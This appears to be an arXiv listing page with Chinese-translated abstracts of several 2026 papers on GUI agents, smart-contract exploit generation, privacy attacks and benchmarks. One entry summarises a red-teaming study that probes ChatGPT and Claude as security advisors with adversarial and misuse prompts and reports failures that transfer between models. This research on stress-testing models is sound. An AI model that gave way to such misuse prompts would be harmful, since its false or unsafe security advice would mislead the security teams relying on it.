Open-source native GUI agents still lag behind closed-source systems on long-horizon navigation tasks. This gap stems from two limitations: a shortage of high-quality, action-aligned reasoning data, and the direct adoption of generic post-training pipelines that overlook the unique challenges of GUI agents. We identify two fundamental issues in these pipelines: (i) standard SFT with CoT reasoning often hurts grounding, and (ii) step-wise RLVR-style training faces partial verifiability, where multiple actions can be correct but only a single demonstrated action is used for verification. This makes offline step-wise metrics weak predictors of online task success. In this work, we present GUI-Libra, a tailored training recipe that addresses these challenges. First, to mitigate the scarcity of action-aligned reasoning data, we introduce a data construction and filtering pipeline and release a curated 81K GUI reasoning dataset. Second, to reconcile reasoning with grounding, we propose action-aware SFT that mixes reasoning-then-action and direct-action data and reweights tokens to emphasize action and grounding. Third, to stabilize RL under partial verifiability, we identify the overlooked importance of KL regularization in RLVR and show that a KL trust region is critical for improving offline-to-online predictability; we further introduce success-adaptive scaling to downweight unreliable negative gradients. Across diverse web and mobile benchmarks, GUI-Libra consistently improves both step-wise accuracy and end-to-end task completion. Our results suggest that carefully designed post-training and data curation can unlock significantly stronger task-solving capabilities without costly online data collection. We release our dataset, code, and models to facilitate further research on data-efficient post-training for reasoning-capable GUI agents.
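
The token reweighting in action-aware SFT can be pictured with a small weighted-loss sketch. The abstract does not give the actual weights or normalization, so the weighted average below, the `action_weight` parameter, and the function name are all assumptions made for illustration.

```python
def weighted_token_loss(token_nlls, is_action_token, action_weight=2.0):
    """Weighted mean of per-token negative log-likelihoods.

    Tokens flagged as action/grounding tokens get `action_weight`;
    all other (reasoning) tokens get weight 1.0.
    """
    total = 0.0
    weight_sum = 0.0
    for nll, is_action in zip(token_nlls, is_action_token):
        weight = action_weight if is_action else 1.0
        total += weight * nll
        weight_sum += weight
    return total / weight_sum


# Toy sequence: two reasoning tokens followed by two action tokens.
nlls = [0.5, 0.5, 2.0, 2.0]
mask = [False, False, True, True]

uniform = weighted_token_loss(nlls, mask, action_weight=1.0)
emphasized = weighted_token_loss(nlls, mask, action_weight=3.0)
```

With uniform weights the poorly predicted action tokens are diluted by the easy reasoning tokens; raising `action_weight` makes them dominate the loss, which is the intended emphasis on action and grounding.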

2602.19450 2026-05-27 cs.CR cs.AI 版本更新

Red-Teaming Claude Opus and ChatGPT-based Security Advisors for Trusted Execution Environments

对基于Claude Opus和ChatGPT的TEE安全顾问进行红队测试

Kunal Mukherjee, Spandan Mukherjee

发表机构 * Virginia Tech(弗吉尼亚理工大学) The University of Texas at Dallas(德克萨斯大学达拉斯分校)

AI总结 针对TEE安全顾问角色下的LLM助手(ChatGPT-5.2和Claude Opus-4.6),提出TEE-RedBench评估方法,发现提示诱导的失败可跨模型迁移(最高12.02%),并通过LLM-in-the-loop流水线减少80.62%的失败。

Comments Accepted for publication in ACM CAIS '26 Workshop on AI Discovery in the Wild (AID-Wild)

详情
AI中文摘要

可信执行环境(TEE)(例如Intel SGX和Arm TrustZone)旨在保护敏感计算免受受损操作系统的攻击,但实际部署仍然容易受到微架构泄漏、侧信道攻击和故障注入的影响。与此同时,安全团队越来越依赖大型语言模型(LLM)助手作为TEE架构审查、缓解规划和漏洞分类的安全顾问。这创建了一个社会技术风险面:助手可能产生TEE机制的幻觉、过度声称保证(例如,证明能做什么和不能做什么),或在对抗性提示下表现不安全。 我们针对两个广泛部署的LLM助手(ChatGPT-5.2和Claude Opus-4.6)在TEE安全顾问角色中进行了红队研究,重点关注提示诱导失败的固有局限性以及跨LLM的可转移性。我们引入了TEE-RedBench,一种基于TEE的评估方法,包括:(i) 针对LLM中介安全工作的TEE特定威胁模型,(ii) 结构化的提示套件,涵盖SGX和TrustZone架构、证明和密钥管理、威胁建模以及非操作性缓解指导,以及策略边界滥用探测,(iii) 注释标准,联合衡量技术正确性、基础性、不确定性校准、拒绝质量和安全有用性。我们发现一些失败并非纯粹的特异性,可跨LLM助手转移高达12.02%,我们通过概述“LLM-in-the-loop”评估流水线将这些结果与安全架构联系起来:策略门控、检索基础、结构化模板和轻量级验证检查,这些组合可将失败减少80.62%。

英文摘要

Trusted Execution Environments (TEEs) (e.g., Intel SGX and Arm TrustZone) aim to protect sensitive computation from a compromised operating system, yet real deployments remain vulnerable to microarchitectural leakage, side-channel attacks, and fault injection. In parallel, security teams increasingly rely on Large Language Model (LLM) assistants as security advisors for TEE architecture review, mitigation planning, and vulnerability triage. This creates a socio-technical risk surface: assistants may hallucinate TEE mechanisms, overclaim guarantees (e.g., what attestation does and does not establish), or behave unsafely under adversarial prompting. We present a red-teaming study of two widely deployed LLM assistants in the role of TEE security advisors: ChatGPT-5.2 and Claude Opus-4.6, focusing on the inherent limitations and transferability of prompt-induced failures across LLMs. We introduce TEE-RedBench, a TEE-grounded evaluation methodology comprising (i) a TEE-specific threat model for LLM-mediated security work, (ii) a structured prompt suite spanning SGX and TrustZone architecture, attestation and key management, threat modeling, and non-operational mitigation guidance, along with policy-bound misuse probes, and (iii) an annotation rubric that jointly measures technical correctness, groundedness, uncertainty calibration, refusal quality, and safe helpfulness. We find that some failures are not purely idiosyncratic, transferring up to 12.02% across LLM assistants, and we connect these outcomes to secure architecture by outlining an "LLM-in-the-loop" evaluation pipeline: policy gating, retrieval grounding, structured templates, and lightweight verification checks that, when combined, reduce failures by 80.62%.

2511.02780 2026-05-27 cs.CR cs.AI cs.SE 版本更新

PoCo: Agentic Proof-of-Concept Exploit Generation for Smart Contracts

PoCo:智能合约的代理式概念验证漏洞利用生成

Vivi Andersson, Sofia Bobadilla, Harald Hobbelhagen, Martin Monperrus

发表机构 * KTH Royal Institute of Technology(皇家理工学院)

AI总结 提出PoCo框架,通过代理式Reason-Act-Observe循环自动从自然语言漏洞描述生成可执行的PoC漏洞利用,在23个真实报告上优于基线方法。

Comments Under review

详情
AI中文摘要

智能合约在高度对抗的环境中运行,漏洞可能导致重大财务损失。因此,智能合约需进行安全审计。在审计中,概念验证(PoC)漏洞利用通过向利益相关者证明报告的漏洞是真实、可重现且可操作的,发挥着关键作用。然而,手动创建PoC耗时、易出错,且常受限于紧张的审计时间表。我们提出PoCo,一个代理式框架,可从审计人员编写的自然语言漏洞描述中自动生成可执行的PoC漏洞利用。PoCo通过在与一组代码执行工具交互的Reason-Act-Observe循环中以代理方式自主生成PoC漏洞利用。它生成与Foundry测试框架兼容的完全可执行漏洞利用,可直接集成到审计报告和其他安全工具中。我们在23个真实漏洞报告的数据集上评估PoCo。PoCo始终优于零样本和工作流基线,生成格式良好且逻辑正确的PoC。我们的结果表明,代理式框架可以显著减少智能合约审计中高质量PoC所需的工作量。我们的贡献为智能合约安全社区提供了可操作的知识。

英文摘要

Smart contracts operate in a highly adversarial environment, where vulnerabilities can lead to substantial financial losses. Thus, smart contracts are subject to security audits. In auditing, proof-of-concept (PoC) exploits play a critical role by demonstrating to the stakeholders that the reported vulnerabilities are genuine, reproducible, and actionable. However, manually creating PoCs is time-consuming, error-prone, and often constrained by tight audit schedules. We introduce PoCo, an agentic framework that automatically generates executable PoC exploits from natural-language vulnerability descriptions written by auditors. PoCo generates these exploits autonomously by interacting with a set of code-execution tools in a Reason-Act-Observe loop. It produces fully executable exploits compatible with the Foundry testing framework, ready for integration into audit reports and other security tools. We evaluate PoCo on a dataset of 23 real-world vulnerability reports. PoCo consistently outperforms the Zero-shot and Workflow baselines, generating well-formed and logically correct PoCs. Our results demonstrate that agentic frameworks can significantly reduce the effort required for high-quality PoCs in smart contract audits. Our contribution provides actionable knowledge for the smart contract security community.

2510.07231 2026-05-27 cs.CL cs.AI 版本更新

EconCausal: A Context-Aware Economic Reasoning Benchmark for Large Language Models

EconCausal: 面向大语言模型的上下文感知经济推理基准

Donggyu Lee, Hyeok Yun, Meeyoung Cha, Sungwon Park, Sangyoon Park, Jihee Kim

发表机构 * Graduate School of Data Science, KAIST(韩国科学技术院数据科学研究生院) College of Business, KAIST(韩国科学技术院商学院) Data Science for Humanity Group, MPI-SP(马克斯·普朗克安全与隐私研究所“数据科学为人类”研究组) School of Computing, KAIST(韩国科学技术院计算学院) Division of Social Science, HKUST(香港科技大学社会科学系)

AI总结 提出EconCausal基准,包含从顶级经济金融期刊提取的10,490个上下文标注因果三元组,评估大语言模型在指定上下文中推断因果方向及随上下文变化调整判断的能力。

详情
AI中文摘要

社会经济因果效应高度依赖于制度和环境背景。相同的干预措施在不同监管制度、市场条件、时间段或人群中可能产生不同甚至相反的效果。这对大语言模型(LLM)在决策支持角色中提出了挑战:它们能否在指定上下文中推断因果效应的方向,并在上下文变化时修正该判断?为此,我们引入了EconCausal,这是一个大规模基准,包含从顶级经济和金融期刊的2,595项高质量实证研究中提取的10,490个上下文标注因果三元组,通过严格的四阶段流程构建,包括多轮共识、上下文细化和多批评者过滤。跨模型实验表明,LLM往往无法根据上下文调整其预测。虽然顶级模型在固定、显式上下文中达到88%的准确率,但在需要跨上下文修正符号的情况下,准确率下降32.6个百分点(从73.9%降至41.3%),一旦引入误导性的符号证据,准确率降至50%以下。模型还过度承诺于方向性(+/-)符号,仅在13.8%的情况下识别出零效应,且在这些类别上校准不良。数据集和基准公开于 https://anonymous.4open.science/r/econcausal-benchmark-6F12。

英文摘要

Socio-economic causal effects depend heavily on their institutional and environmental contexts. The same intervention can produce different, even opposite, effects across regulatory regimes, market conditions, time periods, or populations. This poses a challenge for large language models (LLMs) in decision-support roles: can they infer the direction of a causal effect under a specified context, and revise that judgment when the context changes? To address this, we introduce EconCausal, a large-scale benchmark of 10,490 context-annotated causal triplets extracted from 2,595 high-quality empirical studies in top-tier economics and finance journals, constructed through a rigorous four-stage pipeline with multi-run consensus, context refinement, and multi-critic filtering. Across models, LLMs often fail to condition their predictions on context. While top models reach 88% accuracy in fixed, explicit contexts, accuracy falls by 32.6 pp on cases that require revising the sign across contexts (73.9% to 41.3%), and drops below 50% once misleading signed evidence is introduced. Models also over-commit to directional (+/-) signs, recognizing null effects only 13.8% of the time while remaining poorly calibrated on these categories. The dataset and benchmark are publicly available at https://anonymous.4open.science/r/econcausal-benchmark-6F12.

2602.17605 2026-05-27 cs.CV cs.AI cs.CY cs.LG 版本更新

Adapting Actively on the Fly: Relevance-Guided Online Meta-Learning with Latent Concepts for Geospatial Discovery

即时主动适应:面向地理空间发现的相关性引导在线元学习与潜在概念

Jowaria Khan, Anindya Sarkar, Yevgeniy Vorobeychik, Elizabeth Bondi-Kelly

发表机构 * University of Michigan, Ann Arbor, MI, USA(密歇根大学,安阿伯分校) Washington University in St. Louis, St. Louis, MO, USA(华盛顿大学圣路易斯分校)

AI总结 提出一个统一的地理空间发现框架,结合主动学习、在线元学习和概念引导推理,通过概念加权不确定性采样和相关性感知元批次形成策略,在有限数据和动态环境下高效发现隐藏目标。

详情
AI中文摘要

在环境监测中,数据收集通常成本高昂、稀疏且受紧急公共卫生需求影响。这对于致癌的PFAS(全氟和多氟烷基物质)污染尤其如此,与领域专家和环境组织的讨论强调需要在有限的采样预算下战略性地识别高风险、观测不足的区域。更广泛地说,在灾害响应和公共卫生环境中也出现了类似的挑战,动态环境使得从有限的地面实况中高效发现隐藏目标变得至关重要。然而,稀疏且有偏差的地理空间标签限制了现有基于学习方法(如强化学习)的适用性。为了解决这个问题,我们提出了一个统一的地理空间发现框架,该框架集成了主动学习、在线元学习和概念引导推理。我们的方法引入了两个基于共享的*概念相关性*概念的关键创新,该概念捕捉领域特定因素如何影响目标存在:一个*概念加权不确定性采样策略*,其中不确定性通过从现成概念(如土地覆盖和源距离)学习到的相关性进行调节;以及一个*相关性感知元批次形成策略*,该策略在在线元更新期间促进语义多样性,提高动态环境中的泛化能力。我们在PFAS污染发现任务上评估了我们的框架,这是一个受真实世界启发的环境监测任务,展示了在有限数据和变化条件下鲁棒的目标发现能力。

英文摘要

In environmental monitoring, data collection is often costly, sparse, and shaped by urgent public-health needs. This is particularly true for cancer-causing PFAS (Per- and polyfluoroalkyl substances) contamination, where discussions with domain experts and environmental organizations highlight the need to strategically identify high-risk, under-observed regions under tight sampling budgets. More broadly, similar challenges arise in disaster response and public health settings, where dynamic environments make it essential to efficiently uncover hidden targets from limited ground truth. Yet sparse and biased geospatial labels limit the applicability of existing learning-based methods, such as reinforcement learning. To address this, we propose a unified geospatial discovery framework that integrates active learning, online meta-learning, and concept-guided reasoning. Our approach introduces two key innovations built on a shared notion of *concept relevance*, capturing how domain-specific factors influence target presence: a *concept-weighted uncertainty sampling strategy*, where uncertainty is modulated by learned relevance from readily available concepts such as land cover and source proximity; and a *relevance-aware meta-batch formation strategy* that promotes semantic diversity during online-meta updates, improving generalization in dynamic environments. We evaluate our framework on PFAS contamination discovery as a real-world inspired environmental monitoring task, demonstrating robust target discovery under limited data and changing conditions.

2510.03352 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Inference-Time Search Using Side Information for Diffusion-Based Image Reconstruction

基于侧信息的推理时搜索用于扩散模型图像重建

Mahdi Farahbakhsh, Vishnu Teja Kunde, Dileep Kalathil, Krishna Narayanan, Jean-Francois Chamberland

发表机构 * Department of Electrical and Computer Engineering, Texas A&M University(电气与计算机工程系,德克萨斯A&M大学)

AI总结 提出一种即插即用、无需训练的推理时搜索框架,将侧信息融入现有扩散模型逆问题求解器,显著提升重建质量。

详情
AI中文摘要

扩散模型已被用作解决逆问题的先验。然而,现有方法通常忽略了能够显著提高重建质量的侧信息,尤其是在严重病态设置中。在这项工作中,我们提出了一种新颖的框架,通过推理时搜索将侧信息以即插即用、无需训练的方式融入现有的基于扩散模型的逆问题求解器。通过在多种逆问题(包括图像修复、超分辨率和几种去模糊任务)以及多种基于扩散模型的逆问题求解器(DPS、DAPS和MPGD)上的大量实验,我们表明,用我们的框架增强每个求解器,其重建质量始终优于相应的原始方法。为了展示我们方法的通用性,我们考虑了多种形式的侧信息,包括参考图像、文本描述和解剖学MRI扫描。代码可在该仓库中获取:https://github.com/mahdi-farahbakhsh/DISS。

英文摘要

Diffusion models have been used as priors for solving inverse problems. However, existing approaches typically overlook side information that could significantly improve reconstruction quality, especially in severely ill-posed settings. In this work, we propose a novel framework that incorporates side information into existing diffusion-based inverse problem solvers via inference-time search, in a plug-and-play, training-free manner. Through extensive experiments across a range of inverse problems, including inpainting, super-resolution, and several deblurring tasks, and across multiple diffusion-based inverse problem solvers (DPS, DAPS, and MPGD), we show that augmenting each solver with our framework consistently improves the quality of the reconstructions over the corresponding original method. To demonstrate the generality of our approach, we consider diverse forms of side information, including reference images, textual descriptions, and anatomical MRI scans. The code is available at https://github.com/mahdi-farahbakhsh/DISS.

2602.15919 2026-05-27 stat.ML cs.AI cs.LG 版本更新

Assessing Per-Sample Membership Inference Vulnerability without Retraining

无需重训练的逐样本成员推断脆弱性评估

Valentin Dorseuil, Jamal Atif, Olivier Cappé

发表机构 * ENS, École normale supérieure(巴黎高等师范学院) Université PSL, CNRS(巴黎政治学院、国家科学研究中心) Institut Polytechnique de Paris(巴黎理工 institute)

AI总结 提出一种基于数据依赖几何度量的逐样本成员推断脆弱性评分方法,仅需单个训练模型即可高效识别高风险样本。

详情
AI中文摘要

近期隐私文献表明,针对样本的成员推断攻击(MIA)显著优于非针对性方法。受此启发,我们探讨以下问题:能否在不训练影子模型的情况下评估单个训练点的隐私脆弱性?我们表明,逐样本对MIA的暴露程度不仅受其损失影响,还受数据依赖的几何度量控制。在线性设置中,我们推导出个体黑盒MIA脆弱性的闭式分解,将其分解为总体杠杆得分和残差损失项,明确了样本依赖的几何结构如何转化为隐私暴露。由于大多数现代架构的最后一层是线性的,我们将此框架扩展到深度网络,并提出一种基于最后一层表示的替代评分,仅需单个训练模型且无需影子模型。跨不同数据集和架构的实验表明,我们的评分在识别最先进攻击下的最高风险点时优于损失和梯度范数基线,为逐样本隐私风险评估提供了计算高效且有理论依据的工具。

英文摘要

Recent work in the privacy literature shows that sample-targeted membership inference attacks (MIAs) outperform untargeted approaches by a wide margin. Motivated by this observation, we address the following question: can the privacy vulnerability of individual training points be assessed without training shadow models? We show that per-sample exposure to MIA is governed not only by a point's loss, but also by a data-dependent geometric measure. In the linear setting, we derive a closed-form decomposition of individual black-box MIA vulnerability into a population leverage score and a residual loss term, making explicit how sample-dependent geometry translates into privacy exposure. Since the final layer of most modern architectures is linear, we extend this framework to deep networks and propose a surrogate score operating on last-layer representations that requires only a single trained model and no shadow models. Empirical evaluations across diverse datasets and architectures show that our score outperforms loss and gradient-norm baselines at identifying the highest-risk points under state-of-the-art attacks, providing a computationally efficient and theoretically grounded tool for per-sample privacy risk assessment.
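
For intuition about the two ingredients named in the linear setting, the sketch below computes the classical hat-matrix leverage and the residual for a one-feature least-squares fit. This is the textbook sample leverage, used here only as a stand-in: the paper's "population leverage score" and its exact combination with the loss term are not specified in the abstract, and the function name and data are made up.

```python
from statistics import fmean


def leverage_and_residuals(xs, ys):
    """Leverage and residual of each point in simple linear regression.

    For y = a + b*x fitted by least squares, the leverage of point i is
    h_i = 1/n + (x_i - mean(x))^2 / sum_j (x_j - mean(x))^2.
    """
    n = len(xs)
    x_bar, y_bar = fmean(xs), fmean(ys)
    sxx = sum((x - x_bar) ** 2 for x in xs)
    slope = sum((x - x_bar) * (y - y_bar) for x, y in zip(xs, ys)) / sxx
    intercept = y_bar - slope * x_bar
    leverages = [1.0 / n + (x - x_bar) ** 2 / sxx for x in xs]
    residuals = [y - (intercept + slope * x) for x, y in zip(xs, ys)]
    return leverages, residuals


# Toy data: the last point sits far from the others in feature space.
xs = [0.0, 1.0, 2.0, 3.0, 10.0]
ys = [0.1, 0.9, 2.2, 2.8, 10.0]
leverages, residuals = leverage_and_residuals(xs, ys)
most_exposed = max(range(len(xs)), key=lambda i: leverages[i])
```

The isolated point has by far the highest leverage even though its residual is small, which illustrates why a loss-only score can miss geometrically exposed samples.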

2602.12833 2026-05-27 cs.LG cs.AI cs.MA 版本更新

Vital Trace: Protocol-Constrained Patient-State Reasoning for Longitudinal Clinical Trajectories

Vital Trace: 协议约束的患者状态推理用于纵向临床轨迹

Zhan Qu, Michael Färber

发表机构 * TU Dresden(德累斯顿理工大学)

AI总结 提出Vital Trace,一个协议约束的多智能体框架,通过紧凑的持久患者状态记忆和四个协调智能体(Router、Reasoner、Auditor、Steward)进行分阶段推理,以解决长期临床轨迹推理中的上下文漂移和不稳定问题,在MIMIC-IV和eICU数据集上预测未来血管加压药、呼吸、肾脏支持和恶化任务中优于自由形式多智能体基线。

详情
AI中文摘要

纵向临床推理需要跟踪电子健康记录中患者轨迹的生理测量、实验室结果和干预措施。现有的基于LLM的临床推理系统通常依赖于重复序列化患者历史或交换无约束的文本智能体消息,导致上下文漂移、推理不稳定以及长期推理成本增加。我们提出了Vital Trace,一个协议约束的多智能体框架,用于在动态ICU轨迹上进行未来临床风险预测。Vital Trace不维护无界文本历史,而是使用紧凑的持久患者状态记忆以及由四个协调智能体(Router、Reasoner、Auditor和Steward)执行的分阶段推理。为了支持时间上连贯的推理,我们引入了一个手动策划的全局协议,包含生理状态转换规则和动态患者状态表示,随时间跟踪血流动力学、呼吸、肾脏、代谢和炎症不稳定性。我们在MIMIC-IV和eICU上使用未来血管加压药支持、呼吸支持、肾脏支持和恶化预测任务评估Vital Trace。结果表明,与自由形式多智能体基线相比,结构化的协议约束推理提高了时间一致性、通信稳定性、校准性和可解释性,同时在长期ICU轨迹上实现了强大的预测性能。

英文摘要

Longitudinal clinical reasoning over electronic health records requires tracking evolving physiological measurements, laboratory results, and interventions across extended patient trajectories. Existing LLM-based clinical reasoning systems often rely on repeatedly serializing patient histories or exchanging unconstrained textual agent messages, leading to context drift, unstable reasoning, and growing inference cost over long horizons. We present Vital Trace, a protocol-constrained multi-agent framework for future clinical risk prediction over evolving ICU trajectories. Instead of maintaining unbounded textual histories, Vital Trace uses a compact persistent patient-state memory together with staged reasoning performed by four coordinated agents: a Router, Reasoner, Auditor, and Steward. To support temporally coherent reasoning, we introduce a manually curated Global Protocol containing physiological state-transition rules and a dynamic patient-state representation that tracks hemodynamic, respiratory, renal, metabolic, and inflammatory instability over time. We evaluate Vital Trace on MIMIC-IV and eICU using future vasopressor-support, respiratory-support, renal-support, and deterioration prediction tasks. Results show that structured protocol-constrained reasoning improves temporal consistency, communication stability, calibration, and interpretability compared with free-form multi-agent baselines while achieving strong predictive performance across long ICU trajectories.

2602.11799 2026-05-27 cs.AI cs.IR 版本更新

Hi-SAM: A Hierarchical Structure-Aware Multi-modal Framework for Large-Scale Recommendation

Hi-SAM: 一种面向大规模推荐的分层结构感知多模态框架

Pingjun Pan, Tingting Zhou, Peiyao Lu, Tingting Fei, Hongxiang Chen, Chuanjiang Luo

发表机构 * Netease Cloud Music(网易云音乐)

AI总结 针对多模态推荐中语义ID离散化存在的次优分词和架构-数据不匹配问题,提出Hi-SAM框架,通过解耦语义分词器和分层记忆-锚点Transformer,在冷启动场景下显著提升推荐性能。

Comments Accepted at ACM KDD 2026 ADS

详情
AI中文摘要

多模态推荐因物品具有文本和图像等丰富属性而受到关注。基于语义ID的方法有效地将这些信息离散化为紧凑的令牌。然而,存在两个挑战:(1)次优分词:现有方法(如RQ-VAE)缺乏共享跨模态语义和模态特定细节之间的解耦,导致冗余或崩溃;(2)架构-数据不匹配:普通Transformer将语义ID视为扁平流,忽略了用户交互、物品和令牌的层次结构。将物品扩展为多个令牌会放大长度和噪声,使注意力偏向局部细节而非整体语义。我们提出Hi-SAM,一种分层结构感知多模态框架,包含两个设计:(1)解耦语义分词器(DST):通过几何感知对齐统一模态,并通过从粗到细的策略进行量化。共享码本提取共识,而模态特定码本通过互信息最小化从残差中恢复细微差别;(2)分层记忆-锚点Transformer(HMAT):通过分层RoPE将位置编码分解为物品间和物品内子空间以恢复层次结构。它插入锚点令牌将物品压缩为紧凑记忆,保留当前物品的细节,同时仅通过压缩摘要访问历史。在真实世界数据集上的实验表明,相比最先进基线方法,Hi-SAM持续改进,尤其在冷启动场景中。在服务数百万用户的大规模社交平台上部署后,Hi-SAM在核心在线指标上实现了6.55%的提升。

英文摘要

Multi-modal recommendation has gained traction as items possess rich attributes like text and images. Semantic ID-based approaches effectively discretize this information into compact tokens. However, two challenges persist: (1) Suboptimal Tokenization: existing methods (e.g., RQ-VAE) lack disentanglement between shared cross-modal semantics and modality-specific details, causing redundancy or collapse; (2) Architecture-Data Mismatch: vanilla Transformers treat semantic IDs as flat streams, ignoring the hierarchy of user interactions, items, and tokens. Expanding items into multiple tokens amplifies length and noise, biasing attention toward local details over holistic semantics. We propose Hi-SAM, a Hierarchical Structure-Aware Multi-modal framework with two designs: (1) Disentangled Semantic Tokenizer (DST): unifies modalities via geometry-aware alignment and quantizes them via a coarse-to-fine strategy. Shared codebooks distill consensus while modality-specific ones recover nuances from residuals, enforced by mutual information minimization; (2) Hierarchical Memory-Anchor Transformer (HMAT): splits positional encoding into inter- and intra-item subspaces via Hierarchical RoPE to restore hierarchy. It inserts Anchor Tokens to condense items into compact memory, retaining details for the current item while accessing history only through compressed summaries. Experiments on real-world datasets show consistent improvements over SOTA baselines, especially in cold-start scenarios. Deployed on a large-scale social platform serving millions of users, Hi-SAM achieved a 6.55% gain in the core online metric.
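
One way to read "splits positional encoding into inter- and intra-item subspaces" is that every token carries two indices instead of one flat position. The sketch below only computes those index pairs; the rotary encoding that would consume them is not shown, and the function name and layout are assumptions rather than the paper's implementation.

```python
def hierarchical_positions(tokens_per_item):
    """Return (item_index, token_index) for each token of a flattened sequence.

    tokens_per_item: number of semantic-ID tokens for each item in the
    user's interaction history, in order.
    """
    positions = []
    for item_index, n_tokens in enumerate(tokens_per_item):
        for token_index in range(n_tokens):
            positions.append((item_index, token_index))
    return positions


# Toy history: first item encoded with 3 tokens, second item with 2 tokens.
positions = hierarchical_positions([3, 2])
flat_positions = list(range(len(positions)))  # what a plain Transformer would see
```

A flat position treats the first token of the second item as "position 3", whereas the pair `(1, 0)` keeps the information that it opens a new item, which is the hierarchy the abstract says is lost in vanilla Transformers.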

2508.03771 2026-05-27 cs.CY cs.AI 版本更新

Trustworthiness of Legal Considerations for the Use of LLMs in Education

LLM在教育中使用的法律考量可信度

Sara Alaswad, Tatiana Kalganova, Wasan Awad

发表机构 * College of Information Technology(信息科技学院) Brunel University of London(伦敦布鲁内尔大学) Ahlia University(阿利亚大学)

AI总结 本文通过比较全球主要地区(欧盟、英国、美国、中国、海湾合作委员会国家)的AI监管框架,提出针对海湾合作委员会国家的合规中心AI治理框架,以促进教育中AI系统的合法、伦理和文化适应性部署。

Comments 11 pages, 3 figures, 6 tables

详情
Journal ref
Proc. IEEE DASA 2025, Manama, Bahrain, 2025
AI中文摘要

随着人工智能(AI),特别是大型语言模型(LLMs)日益嵌入全球教育系统,确保其伦理、法律和情境适当的部署已成为关键政策问题。本文对全球主要地区(包括欧盟、英国、美国、中国和海湾合作委员会(GCC)国家)的AI相关监管和伦理框架进行了比较分析。它映射了核心可信度原则(如透明度、公平性、问责制、数据隐私和人类监督)如何嵌入区域立法和AI治理结构中。特别强调了GCC地区不断发展的格局,这些国家正在迅速推进国家AI战略和教育部门创新。为支持这一发展,本文提出了一个针对GCC背景量身定制的以合规为中心的AI治理框架。这包括一个分层类型学和机构检查清单,旨在帮助监管机构、教育工作者和开发者将AI采用与国际规范和当地价值观对齐。通过综合全球最佳实践与区域特定挑战,本文为在教育中构建合法、伦理基础和文化敏感的AI系统提供了实用指导。这些见解旨在为未来的监管协调提供信息,并促进不同教育环境中负责任的AI集成。

英文摘要

As Artificial Intelligence (AI), particularly Large Language Models (LLMs), becomes increasingly embedded in education systems worldwide, ensuring their ethical, legal, and contextually appropriate deployment has become a critical policy concern. This paper offers a comparative analysis of AI-related regulatory and ethical frameworks across key global regions, including the European Union, United Kingdom, United States, China, and Gulf Cooperation Council (GCC) countries. It maps how core trustworthiness principles, such as transparency, fairness, accountability, data privacy, and human oversight are embedded in regional legislation and AI governance structures. Special emphasis is placed on the evolving landscape in the GCC, where countries are rapidly advancing national AI strategies and education-sector innovation. To support this development, the paper introduces a Compliance-Centered AI Governance Framework tailored to the GCC context. This includes a tiered typology and institutional checklist designed to help regulators, educators, and developers align AI adoption with both international norms and local values. By synthesizing global best practices with region-specific challenges, the paper contributes practical guidance for building legally sound, ethically grounded, and culturally sensitive AI systems in education. These insights are intended to inform future regulatory harmonization and promote responsible AI integration across diverse educational environments.

2602.10450 2026-05-27 cs.LG cs.AI math.OC 版本更新

Constructing Industrial-Scale Optimization Modeling Benchmark

构建工业规模优化建模基准

Zhong Li, Hongliang Lu, Tao Wei, Yuxuan Chen, Wenyu Liu, Yuan Lan, Fan Zhang, Zaiwen Wen

发表机构 * Great Bay University(大湾大学) Peking University(北京大学) Huawei Technologies Co., Ltd(华为技术有限公司)

AI总结 提出MIPLIB-NL基准,通过结构感知逆向构建方法从真实混合整数线性规划中生成自然语言规范与求解器代码,以评估大语言模型在工业规模优化建模中的性能。

Comments This paper was accepted by ICML'26 for publication

详情
AI中文摘要

优化建模支撑着物流、制造、能源和金融领域的决策,然而将自然语言需求转化为正确的优化公式和可执行求解器代码仍然需要大量人力。尽管大语言模型(LLMs)已被探索用于此任务,但评估仍以玩具级或合成基准为主,掩盖了具有$10^{3}$--$10^{6}$(或更多)变量和约束的工业问题的难度。一个关键瓶颈是缺乏将自然语言规范与基于真实优化模型的参考公式/求解器代码对齐的基准。为填补这一空白,我们引入了MIPLIB-NL,它通过一种结构感知的逆向构建方法从MIPLIB~2017中的真实混合整数线性规划构建而成。我们的流程(i)从平坦的求解器公式中恢复紧凑、可复用的模型结构,(ii)在统一的模型-数据分离格式下,逆向生成明确关联到该恢复结构的自然语言规范,以及(iii)通过专家评审和人类-LLM交互以及独立的逆向检查进行迭代语义验证。这产生了223个一对一的重构,保留了原始实例的数学内容,同时实现了现实的自然语言到优化评估。实验表明,在现有基准上表现良好的系统在MIPLIB-NL上性能显著下降,暴露了在玩具规模下不可见的失败模式。

英文摘要

Optimization modeling underpins decision-making in logistics, manufacturing, energy, and finance, yet translating natural-language requirements into correct optimization formulations and solver-executable code remains labor-intensive. Although large language models (LLMs) have been explored for this task, evaluation is still dominated by toy-sized or synthetic benchmarks, masking the difficulty of industrial problems with $10^{3}$ to $10^{6}$ (or more) variables and constraints. A key bottleneck is the lack of benchmarks that align natural-language specifications with reference formulations/solver code grounded in real optimization models. To fill this gap, we introduce MIPLIB-NL, built via a structure-aware reverse construction methodology from real mixed-integer linear programs in MIPLIB 2017. Our pipeline (i) recovers compact, reusable model structure from flat solver formulations, (ii) reverse-generates natural-language specifications explicitly tied to this recovered structure under a unified model-data separation format, and (iii) performs iterative semantic validation through expert review and human-LLM interaction with independent reconstruction checks. This yields 223 one-to-one reconstructions that preserve the mathematical content of the original instances while enabling realistic natural-language-to-optimization evaluation. Experiments show substantial performance degradation on MIPLIB-NL for systems that perform strongly on existing benchmarks, exposing failure modes invisible at toy scale.

2602.10104 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Olaf-World: Orienting Latent Actions for Video World Modeling

Olaf-World: 面向视频世界模型的潜在动作定向

Yuxin Jiang, Yuchao Gu, Ivor W. Tsang, Mike Zheng Shou

发表机构 * Show Lab, National University of Singapore Research (A*STAR), Singapore

AI总结 提出SeqΔ-REPA对齐目标,通过冻结自监督视频编码器的时序特征差异锚定潜在动作,实现无标签视频中可迁移的动作控制世界模型预训练。

Comments ICML 2026. Project page: https://showlab.github.io/Olaf-World/ Code: https://github.com/showlab/Olaf-World

详情
AI中文摘要

